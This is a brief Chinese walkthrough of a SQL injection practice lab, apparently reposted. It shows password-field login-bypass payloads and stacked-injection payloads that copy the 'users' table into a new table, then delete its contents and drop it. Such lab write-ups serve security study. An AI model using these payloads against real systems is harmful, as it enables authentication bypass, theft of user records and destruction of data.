1.在用户名使用万能密码测试,全部都登录失败。在密码字段使用万能密码测试,使用单引号和引号闭合时登录成功。说明用户名参数注入时存在过滤,密码字段存在单引号闭合的字符型注入。
a' OR 1 = 1# a') OR 1 = 1#
2.堆叠注入:同上几个less,每次登陆时完成一步堆叠注入。
a') OR 1 = 1;CREATE TABLE WhiteMoon LIKE users;# a') OR 1 = 1;INSERT INTO WhiteMoon SELECT * FROM users;# a') OR 1 = 1;DELETE FROM WhiteMoon;# a') OR 1 = 1;DROP TABLE WhiteMoon;#
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
